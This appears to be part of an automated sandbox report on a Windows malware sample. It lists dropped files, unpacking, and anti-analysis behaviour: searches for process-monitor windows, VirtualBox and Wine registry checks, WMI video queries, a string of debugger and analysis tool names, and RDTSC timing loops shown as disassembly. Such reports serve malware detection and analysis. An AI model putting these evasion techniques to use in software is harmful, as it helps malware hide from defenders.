Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ZTM2pfyhu3.exe

Static file information: File size 7085568 > 1048576

Source: ZTM2pfyhu3.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x518a00
Source: ZTM2pfyhu3.exe	Static PE information: Raw size of jbuwepie is bigger than: 0x100000 < 0x1a4400

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe

Unpacked PE file: 0.2.ZTM2pfyhu3.exe.20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jbuwepie:EW;uwwakvzu:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

2_2_00406328

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: PasoCattle.exe.0.dr	Static PE information: real checksum: 0x102e74 should be: 0x10b21d
Source: ZTM2pfyhu3.exe	Static PE information: real checksum: 0x6c1fe4 should be: 0x6d05fb

Source: ZTM2pfyhu3.exe	Static PE information: section name:
Source: ZTM2pfyhu3.exe	Static PE information: section name: .idata
Source: ZTM2pfyhu3.exe	Static PE information: section name:
Source: ZTM2pfyhu3.exe	Static PE information: section name: jbuwepie
Source: ZTM2pfyhu3.exe	Static PE information: section name: uwwakvzu
Source: ZTM2pfyhu3.exe	Static PE information: section name: .taggant
Source: Set-up.exe.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104E090 push eax; ret	3_3_0104E091
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104E090 push eax; ret	3_3_0104E091
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104E090 push eax; ret	3_3_0104E091
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104E090 push eax; ret	3_3_0104E091
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104E090 push eax; ret	3_3_0104E091
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104C71B push FFFFFFD8h; retf	3_3_0104C814
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104C71B push FFFFFFD8h; retf	3_3_0104C814
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104C71B push FFFFFFD8h; retf	3_3_0104C814
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104C71B push FFFFFFD8h; retf	3_3_0104C814
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104C71B push FFFFFFD8h; retf	3_3_0104C814
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0103CAC6 push eax; retf	3_3_0103CACD
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_010485ED push eax; iretd	3_3_01048AB5
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_010485ED push eax; iretd	3_3_01048AB5
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_010485ED push eax; iretd	3_3_01048AB5
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_010485ED push eax; iretd	3_3_01048AB5
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104E090 push eax; ret	3_3_0104E091
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104E090 push eax; ret	3_3_0104E091
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104E090 push eax; ret	3_3_0104E091
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104E090 push eax; ret	3_3_0104E091
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104E090 push eax; ret	3_3_0104E091
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104C71B push FFFFFFD8h; retf	3_3_0104C814
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104C71B push FFFFFFD8h; retf	3_3_0104C814
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104C71B push FFFFFFD8h; retf	3_3_0104C814
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104C71B push FFFFFFD8h; retf	3_3_0104C814
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104C71B push FFFFFFD8h; retf	3_3_0104C814
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0103CAC6 push eax; retf	3_3_0103CACD
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_010485ED push eax; iretd	3_3_01048AB5
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_010485ED push eax; iretd	3_3_01048AB5
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_010485ED push eax; iretd	3_3_01048AB5
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_010485ED push eax; iretd	3_3_01048AB5
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0104E090 push eax; ret	3_3_0104E091

Source: ZTM2pfyhu3.exe

Static PE information: section name: jbuwepie entropy: 7.9527060422292335

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Jump to dropped file
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	File created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	File created: C:\Users\user\AppData\Local\Temp\Set-up.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_005126DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		14_2_005126DD
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0049FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		14_2_0049FC7C

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2349990148.00000000005DB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: PROCMON.EXE
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2349990148.00000000005DB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: X64DBG.EXE
Source: ZTM2pfyhu3.exe, ZTM2pfyhu3.exe, 00000000.00000003.2101045383.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, ZTM2pfyhu3.exe, 00000000.00000002.2141937382.0000000000022000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SBIEDLL.DLL
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2349990148.00000000005DB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WINDBG.EXE
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2349990148.00000000005DB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 7BA4E6 second address: 7BA4F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCB145CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 7BA4F4 second address: 7BA4FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9239F2 second address: 923A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F88FCB145C6h 0x0000000a pop edi 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 923A06 second address: 923A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F88FCAE4296h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F88FCAE4296h 0x00000013 jmp 00007F88FCAE42A4h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 930486 second address: 93048A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 93048A second address: 9304E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCAE42A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F88FCAE42A7h 0x0000000e push eax 0x0000000f jmp 00007F88FCAE42A9h 0x00000014 jp 00007F88FCAE4296h 0x0000001a pop eax 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 930798 second address: 9307C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F88FCB145CCh 0x0000000c jmp 00007F88FCB145D9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9307C4 second address: 9307C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9307C8 second address: 9307D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 93091C second address: 93095D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCAE429Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F88FCAE42A6h 0x0000000e pushad 0x0000000f jmp 00007F88FCAE429Bh 0x00000014 push edx 0x00000015 pop edx 0x00000016 jne 00007F88FCAE4296h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 93095D second address: 930961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 930C02 second address: 930C25 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F88FCAE42A9h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 930C25 second address: 930C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 jnl 00007F88FCB145CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9333EF second address: 933406 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F88FCAE429Ch 0x00000008 js 00007F88FCAE4296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 933406 second address: 93340A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 93340A second address: 933410 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 933410 second address: 93341A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F88FCB145C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 93341A second address: 933430 instructions: 0x00000000 rdtsc 0x00000002 js 00007F88FCAE4296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 933430 second address: 933436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 933436 second address: 93343C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 93343C second address: 933440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 933440 second address: 933467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b jmp 00007F88FCAE42A7h 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 933679 second address: 9336B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007F88FCB145D5h 0x00000010 push 00000000h 0x00000012 sbb ch, 0000005Dh 0x00000015 push F5072AC5h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F88FCB145CDh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9336B2 second address: 93371C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCAE42A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 0AF8D5BBh 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F88FCAE4298h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a push 00000003h 0x0000002c movsx edx, si 0x0000002f push 00000000h 0x00000031 mov edi, ecx 0x00000033 push 00000003h 0x00000035 mov ecx, dword ptr [ebp+12A71CA5h] 0x0000003b call 00007F88FCAE4299h 0x00000040 jmp 00007F88FCAE429Fh 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 93371C second address: 93372F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCB145CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 93372F second address: 9337B6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F88FCAE4296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 jmp 00007F88FCAE42A8h 0x00000015 pop ecx 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 jnc 00007F88FCAE4298h 0x0000001f pushad 0x00000020 jmp 00007F88FCAE429Fh 0x00000025 jmp 00007F88FCAE429Ah 0x0000002a popad 0x0000002b popad 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 pushad 0x00000031 jmp 00007F88FCAE42A9h 0x00000036 pushad 0x00000037 jmp 00007F88FCAE42A6h 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9337B6 second address: 9337E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 mov edi, eax 0x00000009 mov edx, dword ptr [ebp+12A73C00h] 0x0000000f lea ebx, dword ptr [ebp+12BED30Ah] 0x00000015 mov dword ptr [ebp+12A729A6h], ecx 0x0000001b xchg eax, ebx 0x0000001c jmp 00007F88FCB145D1h 0x00000021 push eax 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9337E9 second address: 9337ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 933838 second address: 93383C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 93383C second address: 933840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 933840 second address: 9338B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 cld 0x0000000a push 00000000h 0x0000000c mov dx, D4EFh 0x00000010 push 0C264083h 0x00000015 push edi 0x00000016 jne 00007F88FCB145DDh 0x0000001c pop edi 0x0000001d xor dword ptr [esp], 0C264003h 0x00000024 push 00000003h 0x00000026 sub dword ptr [ebp+12A7257Eh], ecx 0x0000002c mov edi, dword ptr [ebp+12A73B14h] 0x00000032 push 00000000h 0x00000034 mov edx, dword ptr [ebp+12A7396Ch] 0x0000003a push 00000003h 0x0000003c mov dword ptr [ebp+12A7279Dh], edi 0x00000042 push BDBE0A3Ah 0x00000047 push eax 0x00000048 push edx 0x00000049 push edi 0x0000004a jmp 00007F88FCB145D7h 0x0000004f pop edi 0x00000050 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9338B9 second address: 9338C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F88FCAE4296h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9338C3 second address: 9338C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
